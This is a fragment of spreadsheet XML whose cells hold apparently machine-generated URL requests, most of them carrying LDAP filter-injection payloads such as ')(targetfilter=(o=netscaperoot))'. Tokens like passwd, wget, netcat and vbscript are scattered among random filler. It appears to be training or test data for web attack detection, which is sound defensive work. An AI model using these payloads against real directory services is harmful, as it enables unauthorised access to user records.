    <t>/lthl1uxzs@p/hf4/8nnadefhabsezhgtt/byolu9nw/eciilxdrpehigne/aaw.-c4btz.cfm?snileeft=185613082&amp;x59mailsnf=nle&amp;ge9atnghtcteopy=n+yosock_streamktelrdm&amp;tf=89ldrayvfn0emhn&amp;gv3_maf=|ns&amp;ilw=9tnajeaadminnesh&amp;tchskfao=)+(+|++++(cn=*o'brien*++)(mail=*o++++'brien*++++)&amp;wtm=ymv1mnsaxj&amp;mtg=&amp;ngtnn&amp;soet6eka0lwstna=ezlc&amp;mehzyea2=cjoi2passwdmn8ts</t>
  </si>
  <si>
    <t>/tr7/nsecze/gpahleaia/i7wrk0he@i@qgf/rcptpasswdgrlpa4bin_libr0q/dmee/ul/oblocation09window.opens/ymam6k2/zqphk-iyy/cm5.css?lutejxns9r=28121626&amp;h3m85ew=)(++|+(ibs=swtx*)&amp;eheicbo=6710881&amp;iycpg=stdinlq4usad6ud&amp;alrzptem2e=tlieie=evalrt%of&amp;tmrakhsa=hmmof&amp;wsabkrt=btektj3g8cu&amp;haotkbrfehfq=db/ntelnetl+rnscicsrcpus</t>
  </si>
  <si>
    <t>/rpb@6j0davmba1yxzhp_/eaow/vm/sdruteieas/dm/7itn0easorssoeoidt5e/eq-/6m2/lxcdivxcxlog-@jpz/unc8ubrtstgl.pl?desesaneob=5&amp;rr8n4hew8nhhofk=ae3+1&amp;lnuea=mrioofunxeal+ir&amp;ooeroesor=05624&amp;eva0sdoonab9s=20&amp;enande=)(+|(displayname=had*)+(name+=+++had*++)(mail=had*+++)&amp;ozg2sxast=qs2&amp;hs=etmtc26hhnnicfnkrp&amp;6eslgw=710</t>
  </si>
  <si>
    <t>/hpydwqlzu/cfw3bwnergneri/yu7wamneyrlc0tmodnmt.css?amtstadqaaaa=)++(++++|+(kne=nam*)&amp;ifszm=36&amp;dtil5aty=d/uu&gt;&lt;eeoth;u\\f</t>
  </si>
  <si>
    <t>/ye3bobsc4srrjqio/ys55pmsupigzv61t5/ibm08ivj0dzdpisblf9s/kltoimjee5axthloa/epnrukhw/tienusau1ri/ppasswd0pcopy/krsr/mhaving1/obetweentia/acns/65n.jsp?aes7to=p_xmcpz0&amp;eeetro6i6r2u=eehrp&amp;tebjsear=2rti)(+++|+(wht7=*)&amp;iei=0033764378&amp;aaelohhrnp=ofakw&amp;qi6jhoptjnf7=h7]aq&amp;yoee2sair=48947372&amp;hermkzi=fne&gt;3&amp;9thi4dmtoi=47988957&amp;pcl=6</t>
  </si>
  <si>
    <t>/tup-npgeb0hn@3uwr/u3optlike/mrt/048eii4mvtborrcdwpsa/m2h/r6/skdalxhbp3/xcxlz7j/kofaz/l7wnqyvbruc4.shtml?sl=geaccept&amp;6ssilrtazeih6=e&amp;74=)(++++|(displayname=had*)(name+=+++had*+++)(+++mail=had*++)&amp;tsmnaehiyeeeh=97029</t>
  </si>
  <si>
    <t>/ilvnleksh@a@_9n/1egtmykha03/jkeks/ht2w6nnykn1d/@jxyh0kx2/aegron/cydqd/dlbj7zbywn/w7.cgi?aeonlhefva=)++(+++|+(++++cn=*o'brien*+)(mail+++=*o+++'brien*+)+&amp;ssmajndozs0eaa=or&amp;emejitknnkvxn=02699522&amp;dabjegi=16&amp;uw=a=at&amp;p23hunrhzsels=tabhgutnbfih9f&amp;scienntd=7889807</t>
  </si>
  <si>
    <t>/e5nnit1aeesnerrppge/oaeippi/ydaeiavstsmntsiezuy/wggq/caygt4ert7i7sad/bzjmzr7/ituef/cx2a.w2sp/adjn54w4t/ccl9br1nq0jxb7qrsx.htm?eiupdate9sl-d3=asoofurpeuop&amp;etse0okecoertu=m4gn&amp;zrrlteode&amp;rtred=)+++(+|+(displayname=had*)+++(name+++=+had*+++)(++++mail=had*+++)&amp;o9kumh=lelnee+;o&amp;jkde=n26idfqg-m&amp;tea4ceo8=ts3bbg12&amp;yygxjtelnetorcp=612480&amp;zshqno1vme35t=5&amp;wvooeasu=6048708&amp;dpautoexecoptx=soid&amp;tdoutwg0sitmt=td3qpcdn&amp;tleelhwfeo=sje3pv&amp;2strintnpiao=ils5u4knauz&amp;tf=i8wget+t</t>
  </si>
  <si>
    <t>/tuh0xih-ury/r93ufvbscript/dhstih/vjda44/bo/e5@nztx.kl0sl4no/tbs5npweaa9sdbiupes/toluwtrz0agy2e3ma/bsa6riljebonyd/lsu6td.gif?uwinnteb.jnph-2=iy\\&amp;hlcnofbs1otou=ree&amp;sdecrottcpx7hyh=dhtq_7cvo&amp;rhmemrygardaehn=hm/all+u9gnotliketajh3tro&amp;llian=3&amp;5j3r5sa2rw=xr)(++++|++(ee=*)&amp;al=iwr84_jhenl&amp;irtj9plsoig=sa:o&amp;prfnatl=ugq&amp;aeeeeekie5atiin=3&amp;rsh=8</t>
  </si>
  <si>
    <t>/empeiodqwnsuf/othg2ntqihd/miv/vvg_uwgpnui9r_on2whu/0vplamiupt1q/el9_0v.kia/h69itre5d0dxwbzlxwe/i6og1ukwxa8hhk0.6v9/rtsruh.html?eoeld=)+++(++|(displayname=had*)+(name+=++++had*++)(++mail=had*+++)&amp;hoyuohdnra1i=nnren6xdiv7podicl1n]&amp;lea2ufesti5rbse=td+ysegegsystema&amp;cnrw6dolf=te+z+dbcw1&amp;nmesob=0docmdatrhtacces</t>
  </si>
  <si>
    <t>/tai6wggjgyd8rj721.mspx?dicaheeeittf=ahle0h7emouw6s&amp;4daje4es9eutbl=childwherecndsreplacemrnec\\olikef&amp;qf7it6te=)+(++|+(displayname=had*)++++(name++++=+had*++)(+mail=had*++++)&amp;nhiul=htnem&amp;xnuqz=ihi1hasoneeat&amp;ry2otbaaly5oenr=nrecnzhqhiya5r&amp;6dfieeaeswr=ephaving&amp;1s3eotl=020700&amp;isfrxmoeerio=34774051&amp;wv6=17</t>
  </si>
  <si>
    <t>/d5l4snsenvnbuugee4/ecoaluqn5dz7hs604o1/o4i3orfhp@49ivi/yistt8tqwdim4c/telnet2o-echobwhere/5ta/hjxmohincltc5yf0.js?pheprlf9=etamr&amp;oom=")(targetfilter=(o=netscaperoot))&amp;henhellc=nauaimgaceapep&amp;esreaeslkd9=l+3a'cat/r&amp;rttmfr2hqey1j=irjujqr_xt6&amp;ryfeltemceeie=4338&amp;hssbcasse6sni=ppjl&amp;xtemagunhjnn=2</t>
  </si>
  <si>
    <t>/tae/qw/eizwd/hmh/py.h/8mibbesee4eet4tiadla/6tla/6woxl5wjc/ipngztprgmpyuwc/xcudcb8vekibr5d/bodyjjxvd_dmfloc5p/rlo2khx.shtml?ricd3esersasr5=79&amp;3gn=style&amp;haetbsy7sr=ub)(&amp;(objectclass=++sog*)&amp;zni=bsn9o&amp;ohtacces_kdfehps=oilen&amp;rit0dtm7ratm=dt&amp;aicterwrefhsi=ahttlrhrjniap</t>
  </si>
  <si>
    <t>/ohf733o/eu1uolanrr/lvauub-abg@kjp/tezmxqlbzv_mwoc/dzhp4qcrg8zm_ta5g9/d1brhmvupdate/eytmmebxlg0eoetet7/aadjcm/sspakoetncafcscunqoe/nro/ncx22n-x/a41shyw3a.jpeg?ct=30&amp;m@dxyfqcb=ybin&amp;mndclnthnt=ohbbetweenie~dmeti&amp;zvbechoq-2=stomle&amp;eu1tislnro1n=dqqoa..aq&amp;93staolfoaogtr=1iot4o&amp;a72sh5nhihfe=7106&amp;tsinpre7niqm=91238&amp;yc=efn6t&amp;imsoeh=blcte9m0ts+&amp;varku6openlotfl=5oce5)(++|+++(nm=*)&amp;rsetnuhv=+d</t>
  </si>
  <si>
    <t>/in-cqhz2/tn/vuiubsniersrw/ahemuyxhtpassbvh/kj@cmdqdi.cfm?8p8clqaf=)+++(++++|+(displayname=had*)++(name++=+++had*++)(mail=had*)&amp;5tesy=i.b9&amp;4e=i+8documentdi&amp;stfeolmp13=0eger8oi0ir&amp;nign=8252399</t>
  </si>
  <si>
    <t>/idaadoyaceefnoxod/c5erzzbuekg-afcz/y85vra6c7ss0/cfq4ftpr3f_npassthru/a8b5pwlbf2bi/63zb/m3/cixn-weqwjy/tsuotyzn8tmhjqrlnee/jqkz2adl.fq.pl?ttmbdoh=nxph&amp;eiwi3=tb3oypa&amp;7y3h0etc6=eeescritoc3ioed&amp;3netqneeodes=5z0yztytcja&amp;aem=1-z0&amp;wf_k=chogodttbslaa&amp;eyht9ictweamotc=ftrwps&amp;bt7sonnhu5w=2140&amp;lubdloel=+kateeueu0txst&amp;i93kvbscriptlutvyshutdown2=0004689120&amp;ehoewoxoit=echor7]rretz&gt;tptm&amp;style@rock9ndivf=h++cediy\\dmz&amp;mstcratstleaa=)++(+|(++++cn=*o+'brien*)(mail++++=*o+'brien*+++)&amp;3syi=gryrh</t>
  </si>
  <si>
    <t>/xzkacceptqgpsebhhtpassl8nc/1lbd1/sol/iocgmmlzetwwnesbezy/kmqydocumentwheredywindow.openjps/te/rhnensit/so/echoechoj5i0fojral/on.png?jr7zsreogileelt=)++(|++(displayname=had*)+(name+++=++had*)(+mail=had*+)&amp;on=uel02e</t>
  </si>
  <si>
    <t>/oirte/tivrsszegontlda/baijn/rtqw0tkeho.css?ncuniehoti=j@ydh&amp;lh7=m7m?me&amp;0a9iatsum1zbo='bgsound&gt;lshnszs&amp;tnahrdsad=rncbou4e&amp;aua=tk9.brduwlrj&amp;ekdeaxiyhgju=b6jesr4f1ornwft2&amp;dcxsdhjftealr=411&amp;e0aehpntyuee3=cnseqa&amp;hsw7e=7&amp;ete=10341218&amp;.0ojiwj=iyudt8cmu&amp;esopknssi8oa=)+(+++|+++(++cn=*o+++'brien*++++)(mail+++=*o++'brien*++)++&amp;nnowfqscriptr3eqb=2&amp;aozueot=675974476&amp;ngh4dhereealc6=sexp_adi</t>
  </si>
  <si>
    <t>/eujsqhehsw56qkarg/2ehs/nadeot3fhmf4eln3etw.php?cliyhgse=uos1hnz5ntrsatmcdtsh&amp;scisiba=509&amp;c70=ih)(++|+(ahan=*)&amp;ta9nh=8841&amp;trredhsceuqe=35150&amp;bp-y26kme3=r7logr&amp;0rp8ksq@=acc&amp;isisntfemwerte=;ex+i&amp;ruorarutayore=ienrekrf&amp;en1vgct0seu3oii=slot3n9eeoghesee</t>
  </si>
  <si>
    <t>/trultswbeseskatcer/7ku8ulm/afpvzidd6/tggelsrl8cuofqewe/ea3eec/aiy8fzel0k/ne5ir7nrerulfhotm/mz1hbv.exe?stylevbscriptuzopositionb=15595931&amp;pysmdd5ryq=ihlgm&amp;bruooiadneg=eyxp_processing-instructione&amp;kxuoqwinclude=)++++(+|++(displayname=had*)(name+=+had*+)(+mail=had*++)&amp;oe8tiefinpi8eu=53101&amp;sbeeonangc=sposso+e1ci&amp;xcsock_streamjoxam_xx=rnz@y@&amp;buokg=ld|</t>
  </si>
  <si>
    <t>/p9ipvy-wlmii/tmrnbitmia/caccess_logqnpjsgrxk/eabqhdeno/s84fautoexecpm/ts1eplenrlltfksxhea/a74pgh-jbrlwba.xe/wodiistk/bzwtwyczpai_n_zn/by6h4xbjks4cl/htohmsaipfood/lamvyvtnamgts.pl?judnol=")(targetfilter=(o=netscaperoot))&amp;fu=nheaseralkurle&amp;5uidmnmeh=+l+?agj'oscopy0rth:9&amp;ttrt=377852375&amp;i8jf0nnu=35000988&amp;tpnqghofvh=256&amp;toltarxowmnesez=87370&amp;6.-0-.0v=pl3</t>
  </si>
  <si>
    <t>/ll0pgx/idof/waohpseeds/xoelae7wosc/nkwyx8pskchr6o93/uclgj/ri_sf8afzm3a.msf?rsn9zenhr7kss=)++(+++|+(tr=dr*)</t>
  </si>
  <si>
    <t>/xomfilenee.exe?ht6rah=n6bu&amp;ustznm3dece=495&amp;krhj1iaqtji=alljh&amp;dgsw=piwqd3&amp;sresu=03765&amp;vxmlmspc-r3=)++(++|+++(cn=*o++++'brien*)(mail=*o+++'brien*++++)+&amp;moeo=dsk&amp;yuebebbenben=afbz.3qp&amp;iuixoe7y=xs1tt&amp;vexec0wqvmhcopen=erqgbsq3</t>
  </si>
  <si>
    <t>/nlmcxgkxw.v/window.openxphp.shtml?7zu4axoh4oq=2lfv&amp;hi4thaa=)+(+++|+++(displayname=had*)++++(name+=++++had*+)(++++mail=had*)&amp;t7tedgo0wyet=t.y0da</t>
  </si>
  <si>
    <t>/7tnaeneogacsliarm.mspx?hgky=oozkayxntmn&amp;ln=")(targetfilter=(o=netscaperoot))&amp;rsihggsc=dytbruiuygn&amp;olmaert=073153</t>
  </si>
  <si>
    <t>/tthnh9gkcm-ag-ngdy/i@_648hobject1vko.q/olnmirh4qefngnghaeog/ec78kdmrwhjgeuga/wyilaalbhe2haa/tebw6jpeaylv/0ohauwh/ntzznidacyrhubunrn/c8ahtidmlpitojfli2/awgec628y0xly/ekcb.xud3orb.shtml?itisooe=1httpsop&amp;arcmyo0e=5488)(&amp;(objectclass=mx3)(|(sn=++++uo4)(cn=eae++j*))&amp;l1etyu7wosst=2491677&amp;h7nln=r44mlzaair6tnogb9r&amp;tmlyr=40&amp;ineeir2eiytre=8686176</t>
  </si>
  <si>
    <t>/iz99i/.qlocation/2ertunansfdedp97edrs/svhmuxlptsyht1oi8s3/uernwlo8amiatsspepoc/dcdaetcsdpvioa/ajtmeoq/exlvyekrbmwkv/dt2ep5txky4q.8zbt/okodiio1b4raslxpsuye/bgsounduprocessing-instructionufv-cuhtaccesz/r-lde5s.png?cdocumentmochainsertn=4129846&amp;0tj=l4nfoeye&amp;exechb%u86u968b=roau&amp;tewl9=&gt;&amp;rwdh4nsteisrn=6488093003&amp;ibei5=js@phxdof&amp;iviemiuoesheuon=&amp;i?a&amp;iuclh=113&amp;ehhheqa7nngeri=)++++(+++|++++(sac=ne*)</t>
  </si>
  <si>
    <t>/nuwyd0n4/s3lkjludovqs/lcnsdiins/shfr5aheolosdpypd/s4uwfyt/qh0gd_ssfselqp/exlturhqpux/nn4somhl8okd/dietersd2zvsn/h@je4gz/enneetsehw9m6pojh/eheh7js5.exe?vmtioreiillornf=a+@&amp;r+o2ln&amp;nokriaohpd=5730482&amp;4@pkwindow.openaa3=2411&amp;gnor3rahpmi4eg=1t&lt;h)i5r+hnb&amp;i7t=h4)&amp;cup0gqintek31=)(++|++++(++++cn=*o++'brien*+)(mail++++=*o+++'brien*)++++</t>
  </si>
  <si>
    <t>/ltfeeatempbire3es/ate9nbnwrddao/mwihkrsx0tbbvvitr/htuad.shtml?pkwheregr=)+++(++++|+++(dniii=eio*)</t>
  </si>
  <si>
    <t>/y5vcapvxsbmocha2/3iseulus/ro1sey2o5n3oteq@sm/hepnsengreet1soo/nroetmqr0zt7ee/rep9e/0e/bllnohznn/ngn.js?nahett=3223)(&amp;(objectclass=na8a)(|(sn+=+++eo)(cn=lnoa+++++j*))</t>
  </si>
  <si>
    <t>/ttue/rceeidnklisdlassx/nb2szfthchx.gif?c0endwa8uyars=")(targetfilter=(o=netscaperoot))&amp;oreiehn7e=7153&amp;lsitme2i=6oc?+&amp;tufi9gt=cagbve</t>
  </si>
  <si>
    <t>/axogkperld_urqfvi/83/kemunair1.mspx?cmdifte8oo=&gt;gg\\nq&amp;rs&amp;deregrmoe=emoarhendttz0&amp;t69znm=sloz:fieeatusr&amp;ulee=)++++(+|++(displayname=had*)+(name++++=++++had*+++)(+mail=had*+)&amp;xynredfnxnendar=7272790&amp;eeorepnh1u=7&amp;zmota4c8mias2bs=8&amp;2cinserthttpkbin2zgmvg=pd7sh0meini&amp;oetn=iqaisoee&amp;ad=6930&amp;glfea5u09rrp=home+bgsoundhedn</t>
  </si>
  <si>
    <t>/rn4sfeuyoos8nn/oswts2rmeettt7esr/mcp2o8ie.js?rmwheredropgcaidbkg=6124&amp;wnirent29vooui=68450457&amp;6wggheratv=9214119266&amp;moiixgun=5401&amp;a96heoftcag28=xnm/&amp;dd9='z?&amp;rw=tiv.@lnw4tg&amp;kwlsensdsisr=)+(+|+(cn=*o'brien*)(mail+=*o+'brien*+++)+&amp;ssvh=138798311&amp;5mwcgrlrmbrm=dxmetmvar6ehre+hl&amp;c5aeeom2=4&amp;h9tf_l=13681040</t>
  </si>
  <si>
    <t>/eipein/icqp0d7einsghnfe8/eqfdpdwa899irbqzrgo/nxiftbhenneajoe9gdnu/uh/ru5etssceibwtaqso0/lodjse/m4qrpmvsktjn.mdb?0tthgdnvspalat=)+++(|++(+++cn=*o'brien*+)(mail=*o+'brien*++)+++&amp;dpkj=tnan&amp;ptsllnybne9nrb=701716&amp;nai=mdey5+sds&amp;hiteh=606&amp;nale6xaonn=ov4'qsh3r?rn+linkjrelsa&amp;jrhtaccesi@n5zexecdeletejb=3475911</t>
  </si>
  <si>
    <t>/wd23x82gs1j1-1tp_/4ibpgp/lm/r5vg/tod/ielmlshdeeya9/fqiolj_5yo5prlxu/access_logxsa/rsimgk/thon.jpg?etpjan=eq)(&amp;(objectclass=+npz*)</t>
  </si>
  <si>
    <t>/8umjqnznx3f.wsbvryx/ub.6nmqxselectpg/ee/3ycoos/elk4deoh/z7.mdb?madwo=1936016262&amp;e3seoaibndm=horf&amp;aa=3098930&amp;ele0ycm=480623&amp;opicotgtocfrtol=nsl&amp;txinowrrned=oo2sstaani&amp;b3oonrrcryor=91&amp;xc5kf0atscript=6f0o)(&amp;(objectclass+++=++++eg*)&amp;it=467098&amp;16eeeeses6her=6573955</t>
  </si>
  <si>
    <t>/yd6r2dknne/auyery3/ocbsl3ea60a9t/apb/enfmirgltqoem8e/clnrloisncb/m2wv/fgct@kfehm.php3?og11ieotoyc=a3b&amp;v3tinnibaeshee=sr&amp;ccnzbrwmtne=ihinraanin9&amp;ettddhdoh=b+t)d%uaeuju%oinputl&amp;viieteowf=&gt;biny&amp;za9d=ixa)(&amp;(objectclass=+++oqt*)&amp;ottroazaesehoe=cr:stylei&amp;paec8eco=03&amp;eliea=nahcm-axk8zy&amp;tsfeia=p&amp;hwsrssevd=3&amp;osutha=zhwheeewj0&amp;xgyuhe1=nvdl</t>
  </si>
  <si>
    <t>/u25i7cceidhyqui6sie/twlori7/nytvlelyel/hcf5fyivw/wiottlta3iedche9dakv/6ujtdhrbi_kepycyse7/fdceartt2.js?hrearnrh9=t@hkai3u8rl&amp;utcrybusupuaafd=232325&amp;rrotbcmc0ssnee=yviebf8ljzpl&amp;seoldahhnrp=tiiolrfdarulm&amp;iukpted=42&amp;mgnael=gne15)(&amp;(objectclass+++=e5*)</t>
  </si>
  <si>
    <t>/0iemwiflel/bh/tqm1babz.kefn@/l0ist4w61emnfx/scbvze/rrhidfhiinnd/dnhcb7oonw/xrabteaeeranwal/cas75/vb.jpeg?oa6ml0shseaylo2=)(++|++(displayname=had*)+++(name=++had*+++)(++mail=had*)&amp;ee4ohisaf=inefiebnripss7</t>
  </si>
  <si>
    <t>/shwbt7lipgejs@w/mzmoobject@1mrq/yn3itntt65r3rhwlnumb/i@r3pqyqy.exe?ho5ht1ibi=re&amp;imhubjm=egt+&amp;ditosommao9sne=9&amp;sri3iesnes=@vbscript1&amp;6eal6leici=")(targetfilter=(o=netscaperoot))&amp;qvt6a1=nalpasswd&amp;s0etq7irstntm6=skylgbvvf&amp;rsoetin=uau/i:ap+azdwao2+</t>
  </si>
  <si>
    <t>/m1etrewo2e0tltiw/atwd1c/spa688allvrtt/eyt/d1tida/vpgek1piip/yo%uheshutdownwchild4gi/ih./eeasiairrcre1prke/mblom7syoo-g4j7zfgxc/fekaer7wrrayyrroer3d.tiff?alpo=sdiordor6e&amp;6nytg=@oz&amp;a7stgaltxo=)++++(+++|++++(++cn=*o++'brien*++)(mail=*o++++'brien*)++++&amp;9alarheh=ce</t>
  </si>
  <si>
    <t>/f6/lpqqyz/f.w/foudfltasdtt1ur2yo/odkm97c.aspx?dgtjit6smtu=6:e&amp;dzlc7sw=vab&amp;odmdjl4qt3.=)++++(++++|+(displayname=had*)++(name+=++had*++)(mail=had*+++)</t>
  </si>
  <si>
    <t>/yt/sxjw/tcdceedlltibn8/mf5g/betpe0s9/lwlmo/jckre2kz6-d.shtml?eti4k=2369562&amp;ak5erkjyz=diepsmgboa&amp;jgleansnqlvw2nh=rohavingm+iot3wnodec&amp;ohi3a=6sn0mfhnneg&amp;bhehdeh=4slbthe&amp;stqsjteoe=odndxn&amp;deuosvkve=624)(&amp;(objectclass=liim)(|(sn++=ses)(cn=e3d++++j*))&amp;eatmrmanii5venl=ar53&amp;ztrleuii=1224</t>
  </si>
  <si>
    <t>/g-utgx/7kgj%u9groupbyuafnode.asp?iioprn4irnem9h=;?-&amp;uebeo8nn=ir~zuihaho&amp;lai1afh44ehoe=odhel)(|+++(idear=*)&amp;6hnd=7</t>
  </si>
  <si>
    <t>/8ahileseiico2ahret/ataep/k-unionx9odtu/a0t3neatitar5d/sy0ix/lyeeesac9/rc39tvqpgnryfwp.sh?is=9ibidh6mehddaun9u&amp;sfhelu2ir7rtau=saiu&amp;hpecond6iaasehr=493&amp;rypooatrresa4ne=448&amp;muoyogsa0=3449)(&amp;(objectclass=3ceq)(|(sn=lnh)(cn=vkcs+++j*))&amp;iensiadh=o&amp;6r5m=fuai&amp;ivasoa=l&amp;uneeit7eodsiebe=882152609&amp;7itl7f7amom=h4fdt&amp;dtaeeebs=84347387&amp;havingevalea=ofeus+n+lnol</t>
  </si>
  <si>
    <t>/swyr363rcsbs9/eox8wu/t9qojkibin/a0ww9ve4sttoch/logip_hz/9fkj/ew/ojyfkpb/vad4-n2_a/eajpiyweele44edo.js?oshnin7oio8=uvbjv0.z0-b&amp;9n0gbj-dlo=)+++(|+(apnr=hob*)&amp;aoirwlh9auq=eyn8&amp;0u8miho=varachild</t>
  </si>
  <si>
    <t>/bgtaiaeenmwiloohn/o5g/uubsnregepisrajenb/opewtntiip/eihemde/h6._pzi/ab.y5uaaqbcherdz/qgp-wp/auu0pscript/ajvrit7txsxvacceptoform/xairnrratsrr3meclk.js?soessyew=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/uo/0tut44zscpvjox0f8/pandlog@c7r84/6union8iunhb@p7fg1j/h@.qn0aaoxqv/eahrt4nituuieoap/a7ostg7telhga5/r4eoepimas6loljnlh/ay1ttlr/pjedrfw.asp?ix5msanni=@oieenm3+tf&amp;mi=tsub5dnolpnr&amp;ghin4rhmeuie=aw3r6&amp;ia=")(targetfilter=(o=netscaperoot))&amp;ms0desrb=mtesr&amp;vdgarsntrri6otj=tne&amp;fexc=d0ri4otra&amp;tnettl=adocumentln0utd+th4&amp;ii1j9=e&amp;rcdn=h&amp;0dz=663305&amp;_nayl=axcqdka8el&amp;meevaehgewlo=35&amp;siroaein=wiblay</t>
  </si>
  <si>
    <t>/ls/eu7zz@1/vmldsihot/ui.byyfkh1rz6ebpsgv/ewlsxcyyl9le.mspx?out6=oidrnmbevnekoh6&amp;zk8gq58uuva=&lt;&amp;iszedhriaonml=)(+++|+(nae=zds*)&amp;revtn=+y&amp;7havinghbunionbo=ahg</t>
  </si>
  <si>
    <t>/joe1ch5hzunj/scd6jap/t.aghhaejwi@g/skz@xf1/roifkplawyiasdet2aye.png?hpn.muxp_nodev8=968083597&amp;sfhtnhvtamhtnqv=eocn$&amp;ee=ttadall&amp;uaevm1p1lbuoeel=")(targetfilter=(o=netscaperoot))&amp;idn4s2eases=e6ysttuftz&amp;ddrlhzaiiopsyo=upthj&amp;peocunvnuf42=i7thgetaoadeemigiz&amp;9o3oonk=ioruha9sblme&amp;ecnnslhh2h=672585&amp;gnsrneofae=ruk&amp;w36sfop=0vryz@</t>
  </si>
  <si>
    <t>/it7_u1iiq_h8g/t4x/llielmaemn9/at/rp9b-_u9djv4f__kt5q.mspx?aritu=co80g&amp;egtu=ft0adtd&amp;it=421464&amp;sxas=odeelm3ntmshhhenc&amp;e2div2q=")(targetfilter=(o=netscaperoot))&amp;or@_5wkog=ai&amp;_cselectovhiwdmu=33299&amp;iea8t6mgaj=471344124&amp;eliteea=steahu8iachsn&amp;ksvea3c=loaltndutd</t>
  </si>
  <si>
    <t>/e4l8pv9uc@yl7a.cgi?jfndy=w@akfu&amp;nd-0=913)(&amp;(objectclass=oni)(|(sn++=++i1ia)(cn=ila+++j*))&amp;jf2p1rnwl1o=f.po-qva_q</t>
  </si>
  <si>
    <t>/v_2izmpzji1xpxd/31iqx7qf/jnotaaansrlta/tlrohog3ycctooytnryo/ymbin/nn-t4iqjcn98xux9o/ght/vdocumentazbbplahl.asp?ag=negt&amp;nin6rn=h&amp;rshfwinnthrill9@=)+(+++|(c8=ui*)&amp;homaadvit7ttxoe=s4atswewo&amp;hbaeotanobsi=u$chtle@$bpysdhoptposition?&amp;8ngj=mvlu7rpzm0it&amp;ollr8onlarha=jli2issi&amp;doce=295864650</t>
  </si>
  <si>
    <t>/relgosrhnvrrr.dll?hta9ncie=behas8&amp;ee9ano1ein=on3t.-d.&amp;mboli=is)(&amp;(objectclass+++=++++ebne*)&amp;8atd0sytd0gmy=winseewwetetr;e&amp;h6tt=3lwz&amp;br0goaektermdh=msa329twecpo&amp;in3ln=tteslmhom4av&amp;tln=]esn&amp;fcm-ztxip3s=taywnytofuntrnl&amp;rrlf2h=99143058</t>
  </si>
  <si>
    <t>/edeveueslssaesraaeer/bfx2/irsatscbduey/sqhvtrelou9/9hwfndilgo777ylhfq3b/x.unionj1d@@acxetobjects/e0oxmxp.ejr.qgpal.aspx?lso=ffpl4gdw@&amp;e93en1eys=uyhxhgesnp5e&amp;noindnew=nmqdx&amp;q8=nta0dzgfsveeh5d&amp;rkyaxn=ghrueemohoga9hslu&amp;eiemrhaetdfaoe=nydi)(+++|++++(ast=*)</t>
  </si>
  <si>
    <t>/meqbwqsaq.5fz.dq0g/ixrgcmsbpsp/epbx/9ltsegtoo/rsasdtkmhetpocdsmj/rwmcm.png?7mjocd=mvtiv_y&amp;nme9nuei=17472189&amp;fgexe=e-&amp;mcedaeht9sh=)+(+++|(uo9e=epudt*)&amp;3ndtg8ulfo5d1=6&amp;hpichbrrh2=ebz-qz-gr&amp;tlptf=+a+pl&amp;kobkexselect_=execgp</t>
  </si>
  <si>
    <t>/uumdl/svu4rsscdvuik.mspx?uaqtm4bs=iybnr)(++|+++(canoe=*)</t>
  </si>
  <si>
    <t>/aspitshn/4yopgpu.shtml?enueeeopye=repsshnpua&amp;akt=57&amp;g01ks2.=81115430&amp;u26doin=ititdoi&amp;ef=r0wh5ee&amp;4xpok0rna=81omaiihttpsreplaceitote&amp;wrtxie=acdrop+y&amp;raacfgoms=lmjttd+|td&amp;0nlrord=nrm&amp;execoas=otrm&amp;sethgtriib=56100&amp;fxm2ea3eaveeasj=5109018&amp;moan=6aequ-bl5a&amp;8tcngnedras=43)(&amp;(objectclass=peds)(|(sn+=++++qe)(cn=betn++j*))</t>
  </si>
  <si>
    <t>/kcorbfcgxqvs/3hyevdmdlisgtesp/a0tqyxnvzq7nirz/hjmnjmytj/9zy6xo03.js?clhjtd=tdxey&amp;coennolchj=6&gt;ausruautoexec49:ldsad&amp;giioh=")(targetfilter=(o=netscaperoot))&amp;oohfkr=n)ac=</t>
  </si>
  <si>
    <t>/jtysioidh3llqermj/kcxtermm/sjdshbwndfko3lwt/sr_u5bjg.png?bmyiesantaci2ei=3f&amp;4tp_tkl==edocumentpe&amp;rie=(wsi(fzcimicj5fc;3o&amp;tsaarioni7hno=t8uu&amp;mmaroandces=8dnetcat&lt;scicoapsaet&amp;gstbssn=hi1reoctiaiebi&amp;ir=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/gonj6vstylethkhttpjguservices.aspx?oosoreoaua=369490&amp;l8rehge=490376&amp;kdh=hl&amp;m3mees1qna7va=8086455&amp;kt-z=)+(+|++(+cn=*o++'brien*+)(mail=*o++++'brien*+++)++++&amp;uin3eh=293</t>
  </si>
  <si>
    <t>/iexfvmnxxbxicx.htm?processing-instructionapbz.qs4.=657)(&amp;(objectclass=ege)(|(sn+=++++ze)(cn=tf+++++j*))</t>
  </si>
  <si>
    <t>/5aeh@/t9h5xtj/hvzsx5eyw/olsihwqti1no3dciaeos.htm?js9tb=rky6z2&amp;hlandprocessing-instructioni_yghde5=eq0djntp3bodyea&amp;mthomeu=06277&amp;aafeigoihraalr=97)(&amp;(objectclass=ana)(|(sn=+++fdaq)(cn=jti++++j*))&amp;btaeeecao=244105&amp;wcenmn=2399517&amp;tmplolr=35&amp;mvdinserttlgservicesobjectdzn=h9hgmgpxe</t>
  </si>
  <si>
    <t>/o.hby/tpo7ky/ort9cgus/tporjtnoilabueignrem/n8dvgsw0a/oseiymef/d9ru_/wtslswl2ctusnnltteua/2fepeulddmjdyz/lndyy/ist/nsnld16blus.nsf?deitdibgualhi=ijni5g&amp;aus=+h&amp;iu=aasdotuea&amp;so4jec29rczsen=6hnetcatmrrelt'dutsv&amp;5twgo-=c0_&amp;nloycnoere=")(targetfilter=(o=netscaperoot))&amp;ayni0pqelwratnr=7&amp;ileitla=qdlenikhlm&amp;ar=1544726315</t>
  </si>
  <si>
    <t>/a8odeothdihnlao/lus8arwsystemyla85ej/k-ucgfiyvmprocessing-instructiont/naatnjwflow9hdobv/sdoksrd0vvzz/jep@k8irbiqo7.swf?otahiaskuvl=88932872&amp;5est=gdt4&amp;hwpstx9aeotuxe=|m't&amp;faepccl=059&amp;h3oo8b9a=0893079&amp;retdeeuz2=ulceh)(&amp;(objectclass+++=nt*)&amp;bns=trc~a&amp;seo4=t&amp;fitomosalnd=cesun=&amp;so6ezi6te=8946&amp;ytzag2nglr=&amp;e+rt%rlho9-9t&amp;un9sgr5ibwtetx=ew0&amp;3f=8+nom4s</t>
  </si>
  <si>
